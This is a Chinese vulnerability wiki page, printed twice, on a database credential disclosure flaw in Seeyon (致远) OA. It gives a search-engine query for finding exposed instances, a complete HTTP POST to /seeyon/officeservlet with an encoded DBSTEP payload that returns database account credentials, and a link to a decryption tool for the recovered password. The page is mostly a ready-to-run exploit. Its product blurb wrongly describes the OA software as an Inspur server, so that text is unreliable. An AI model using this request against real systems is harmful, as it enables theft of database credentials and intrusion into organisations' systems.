fofamini-wiki

登录白背景

源码

致远OA 存在数据库账号密码信息泄露漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.9);">致远A8+是中国致远信息技术股份有限公司（Inspur）开发的一款企业级服务器产品。作为致远公司的旗舰机型，A8+可提供高性能、可靠性和可扩展性，适用于各种企业级应用和数据中心环境。致远A8+全版本存在数据库账号密码读取漏洞。</font>

二、影响版本

致远OA

三、资产测绘

hunterapp.name="致远 OA"
特征

四、漏洞复现

POST /seeyon/officeservlet HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL=
Connection: close
Content-Type: application/x-www-form-urlencoded
Host: 
Content-Length: 350

DBSTEP V3.0     285             0               0              
RECORDID=wLoi
CREATEDATE=wLehP4whzUoiw=66
originalFileId=wLoi
needReadFile=yRWZdAS6
originalCreateDate=wLehP4whzUoiw=66
OPTION=LKDxOWOWLlxwVlOW
TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli
COMMAND=BSTLOlMSOCQwOV66
affairMemberId=wLoi
affairMemberName=wLoi

使用解密工具对密码进行解密

DecryptTools-main.zip

原文: https://www.yuque.com/xiaokp7/ocvun2/ek5bcsfrldym3dcc

# 致远OA 存在数据库账号密码信息泄露漏洞

# 一、漏洞简介
<font style="color:rgba(0, 0, 0, 0.9);">致远A8+是中国致远信息技术股份有限公司（Inspur）开发的一款企业级服务器产品。作为致远公司的旗舰机型，A8+可提供高性能、可靠性和可扩展性，适用于各种企业级应用和数据中心环境。致远A8+全版本存在数据库账号密码读取漏洞。</font>

# 二、影响版本
+ 致远OA

# 三、资产测绘
+ hunter`app.name="致远 OA"`
+ 特征

![1699722901222-5422df33-7bbc-4465-8d26-879858556787.png](./img/5v2FLH7YNhV5FuXB/1699722901222-5422df33-7bbc-4465-8d26-879858556787-852409.png)

# 四、漏洞复现
```java
POST /seeyon/officeservlet HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL=
Connection: close
Content-Type: application/x-www-form-urlencoded
Host: 
Content-Length: 350

DBSTEP V3.0     285             0               0              
RECORDID=wLoi
CREATEDATE=wLehP4whzUoiw=66
originalFileId=wLoi
needReadFile=yRWZdAS6
originalCreateDate=wLehP4whzUoiw=66
OPTION=LKDxOWOWLlxwVlOW
TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli
COMMAND=BSTLOlMSOCQwOV66
affairMemberId=wLoi
affairMemberName=wLoi
```

![1713889899088-36f51f75-cd8c-45b5-945b-7aa3462f6e96.png](./img/5v2FLH7YNhV5FuXB/1713889899088-36f51f75-cd8c-45b5-945b-7aa3462f6e96-898137.png)

使用解密工具对密码进行解密

![1713889927124-6011e0a6-ea0d-4817-bbfb-56aa79e9462b.png](./img/5v2FLH7YNhV5FuXB/1713889927124-6011e0a6-ea0d-4817-bbfb-56aa79e9462b-243549.png)[DecryptTools-main.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/29512878/1730787587730-bd15c5e0-2b55-4892-a6ac-7198c04b84d2.zip)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ek5bcsfrldym3dcc>